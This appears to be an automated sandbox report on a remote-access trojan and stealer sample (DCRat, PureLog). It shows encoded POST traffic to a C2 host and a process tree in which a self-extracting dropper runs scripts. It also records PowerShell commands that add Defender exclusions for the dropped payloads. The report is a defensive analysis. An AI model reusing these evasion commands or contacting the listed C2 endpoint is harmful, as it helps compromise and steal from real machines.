Dec 4, 2024 15:47:19.840835094 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 00 33 05 2f 0b 26 2c 2f 15 3f 0a 2c 58 2c 20 37 5f 24 00 22 1b 27 3a 34 0b 2a 2a 2f 5a 36 13 2a 13 2b 17 23 1f 3e 27 09 0f 2a 02 20 58 00 1a 25 06 23 32 01 01 3a 00 23 01 24 2e 21 03 26 3e 21 16 2a 2a 33 57 3e 0d 27 0e 26 00 04 14 2a 23 00 0d 3b 24 35 59 2f 2e 31 06 25 15 2a 52 0e 17 21 51 29 3d 24 1c 34 31 39 13 29 1f 33 59 2b 2c 33 1e 24 3b 32 52 37 2d 21 55 27 33 3a 0b 24 1c 21 0d 24 38 2b 10 32 3f 2b 02 29 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&3/&,/?,X, 7_$"':4*/Z6+#>'* X%#2:#$.!&>!*3W>'&#;$5Y/.1%*R!Q)=$419)3Y+,3$;2R7-!U'3:$!$8+2?+)) _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.5	49997	193.3.168.50	80

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:19.916520119 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:20.274792910 CET	1012	OUT	Data Raw: 5f 5e 5f 59 59 58 5f 57 5a 58 51 52 55 5f 5a 59 50 50 5d 52 59 5a 57 47 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _^_YYX_WZXQRU_ZYPP]RYZWG^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.X;V?#7!8%X48T:U7]'<, :$+"V;)#G $],
Dec 4, 2024 15:47:21.153655052 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:21.388688087 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.5	50003	193.3.168.50	80

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:21.628962994 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:21.978339911 CET	1012	OUT	Data Raw: 5a 5d 5f 58 59 5a 5a 5f 5a 58 51 52 55 5f 5a 53 50 57 5d 59 59 58 57 45 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z]_XYZZ_ZXQRU_ZSPW]YYXWE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.- :( X#P9//%!9,T.00+42=Z$<D#3 *#G $],
Dec 4, 2024 15:47:22.868840933 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:23.104850054 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	50008	193.3.168.50	80

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:23.353916883 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:23.711997032 CET	1012	OUT	Data Raw: 5a 59 5f 5d 59 5c 5a 54 5a 58 51 52 55 55 5a 5b 50 56 5d 59 59 5e 57 47 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZY_]Y\ZTZXQRUUZ[PV]YY^WG^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.^,V%?_8X46"[8Y#9;,3'%<,S T63>36 )=#G $],-
Dec 4, 2024 15:47:24.622600079 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:24.863399029 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	50010	193.3.168.50	80

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:24.973751068 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:47:25.321384907 CET	1888	OUT	Data Raw: 5f 50 5a 59 59 5f 5a 55 5a 58 51 52 55 5f 5a 5c 50 57 5d 5a 59 59 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _PZYY_ZUZXQRU_Z\PW]ZYYWF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-83=^<9775"/,7<V:#]'?$#2.$/" ==#G $],
Dec 4, 2024 15:47:26.384624004 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:26.659352064 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 25 58 33 3b 0e 54 30 3c 2b 50 3c 33 02 5a 2d 0d 09 1c 24 58 2e 1b 25 2a 0d 1c 3e 04 3f 58 21 5b 39 05 3f 39 34 0c 3c 27 20 50 2a 02 20 58 00 1a 26 5c 21 22 0e 59 2d 17 0e 13 25 3d 0b 05 30 3d 0f 16 3e 17 27 53 3d 20 24 10 32 07 36 53 2a 33 26 08 2d 24 04 00 2e 10 22 1b 24 2f 2a 52 0e 17 21 51 2a 07 20 12 37 22 3e 0c 29 57 3f 1b 28 3f 05 11 27 16 22 51 20 3e 3a 0d 33 33 3d 53 30 21 31 0a 24 01 38 06 24 2f 0e 5c 2a 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%X3;T0<+P<3Z-$X.%>?X![9?94<' P X&\!"Y-%=0=>'S= $26S3&-$."$/R!Q* 7">)W?(?'"Q >:33=S0!1$8$/\* _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.5	50011	193.3.168.50	80

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:25.112726927 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:25.461971045 CET	1012	OUT	Data Raw: 5a 5b 5a 5b 5c 59 5a 5e 5a 58 51 52 55 53 5a 5a 50 57 5d 5c 59 5f 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z[Z[\YZ^ZXQRUSZZPW]\Y_WF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-,3:??!5",##-3]3+7T%%>60V=#G $],5
Dec 4, 2024 15:47:26.645378113 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:26.901715040 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	50017	193.3.168.50	80

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:27.154944897 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1008 Expect: 100-continue
Dec 4, 2024 15:47:27.510179043 CET	1008	OUT	Data Raw: 5f 58 5a 5c 5c 5c 5f 55 5a 58 51 52 55 57 5a 5f 50 54 5d 5d 59 5b 57 45 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _XZ\\\_UZXQRUWZ_PT]]Y[WE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY./0)($Y!%"[8!Z#W-7Z';425['.36(*=#G $],5
Dec 4, 2024 15:47:28.424959898 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:28.660636902 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Target ID:	0
Start time:	09:45:13
Start date:	04/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7b0000
File size:	2'300'139 bytes
MD5 hash:	10F971C35D66A56BFF28E89B8F97B849
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2031269682.0000000004F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2031885965.000000000502A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:45:13
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe"
Imagebase:	0xae0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:45:25
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\MsContainer\zXrLq55h.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:45:25
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:45:25
Start date:	04/12/2024
Path:	C:\MsContainer\chainportruntimeCrtMonitor.exe
Wow64 process (32bit):	false
Commandline:	"C:\MsContainer/chainportruntimeCrtMonitor.exe"
Imagebase:	0xc0000
File size:	1'978'368 bytes
MD5 hash:	A961FFE1FAEECF8AD553D4792052498C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2150784593.00000000000C2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2234665352.00000000125F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:45:29
Start date:	04/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:45:29
Start date:	04/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:45:29
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	09:45:29
Start date:	04/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:45:29
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	09:45:30
Start date:	04/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\DtJTopEKFGnyRQt.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:45:30
Start date:	04/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\sppsvc.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:45:30
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	09:45:30
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	09:45:30
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	09:45:31
Start date:	04/12/2024
Path:	C:\Recovery\DtJTopEKFGnyRQt.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\DtJTopEKFGnyRQt.exe
Imagebase:	0xdb0000
File size:	1'978'368 bytes
MD5 hash:	A961FFE1FAEECF8AD553D4792052498C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.3386767298.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.3386767298.00000000038CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\DtJTopEKFGnyRQt.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\DtJTopEKFGnyRQt.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	09:45:31
Start date:	04/12/2024
Path:	C:\Recovery\DtJTopEKFGnyRQt.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\DtJTopEKFGnyRQt.exe
Imagebase:	0xd00000
File size:	1'978'368 bytes
MD5 hash:	A961FFE1FAEECF8AD553D4792052498C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:45:31
Start date:	04/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat"
Imagebase:	0x7ff6fe400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:45:31
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	09:45:31
Start date:	04/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff698440000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	09:45:32
Start date:	04/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff755710000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	09:45:42
Start date:	04/12/2024
Path:	C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe"
Imagebase:	0xc30000
File size:	1'978'368 bytes
MD5 hash:	A961FFE1FAEECF8AD553D4792052498C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	09:45:46
Start date:	04/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	09:45:51
Start date:	04/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.4%
Total number of Nodes:	1510
Total number of Limit Nodes:	44

Executed Functions

Function 007CDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007C0863: GetModuleHandleW.KERNEL32(kernel32), ref: 007C087C
Part of subcall function 007C0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C088E
Part of subcall function 007C0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C08BF

Part of subcall function 007CA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007CA655

Part of subcall function 007CAC16: OleInitialize.OLE32(00000000), ref: 007CAC2F
Part of subcall function 007CAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007CAC66
Part of subcall function 007CAC16: SHGetMalloc.SHELL32(007F8438), ref: 007CAC70

GetCommandLineW.KERNEL32 ref: 007CDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007CDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007CDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 007CDFCE

Part of subcall function 007CDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007CDBF4
Part of subcall function 007CDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007CDC30

CloseHandle.KERNEL32(00000000), ref: 007CDFD7
GetModuleFileNameW.KERNEL32(00000000,0080EC90,00000800), ref: 007CDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0080EC90), ref: 007CDFFE
GetLocalTime.KERNEL32(?), ref: 007CE009
_swprintf.LIBCMT ref: 007CE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 007CE05A
GetModuleHandleW.KERNEL32(00000000), ref: 007CE061
LoadIconW.USER32(00000000,00000064), ref: 007CE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 007CE0C9
Sleep.KERNEL32(?), ref: 007CE0F7
DeleteObject.GDI32 ref: 007CE130
DeleteObject.GDI32(?), ref: 007CE140
CloseHandle.KERNEL32 ref: 007CE183

Strings

sfxstime, xrefs: 007CE055
sfxname, xrefs: 007CDFF9
STARTDLG, xrefs: 007CE0BE
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 007CE039
